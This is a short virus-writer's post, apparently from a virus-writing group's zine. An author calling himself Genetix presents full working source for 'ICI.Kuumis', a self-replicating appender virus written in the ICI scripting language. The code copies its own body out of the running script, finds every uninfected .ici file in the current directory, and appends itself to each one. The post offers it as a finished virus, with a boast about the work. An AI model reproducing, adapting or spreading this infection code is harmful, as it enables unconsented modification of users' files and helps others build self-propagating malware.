I'm so happy this is over! The language seemed to be unfinished, a lot of functions wernt working
so I wasnt able to make anything other than either a prepender or appender.. maybe it works better
under linux...

So anyway the virus was written in what could have been a nice language called ICI
It's a simple Appender infection *.ici in the current directory.

I decided to call it: ICI.Kuumis
written by me: Genetix for the LIP .. again!

//genetix
r := 0;
CWD = argv[0];
scr := array();

forall (i in gettokens(getfile(argv[0]), "\n")) {
   if( i == "//genetix") r := 1;
   push(scr, i);
   if( i == "//stop") break;  
}

CWD ~~= #(.*[\\])#;

dfiles = dir(CWD, #(\.ici)$#, "f");

forall (f in dfiles) {
    inf := 0;
    hscr := array();
    code := "";

    forall (i in gettokens(getfile(CWD+f), "\n")) {
       if ( i == "//genetix") inf = 1;
       push(hscr, i);
    }
    
    if (inf == 0) {
       if (hscr[0] != NULL) {
          forall (i in scr) {
             push(hscr,i);
          }
          p = fopen(CWD+f, "w");
          forall (o in hscr) {
             code = "\n"+o;
             printf(p, code);
          }
          close(p);
       }
    }
}

//stop
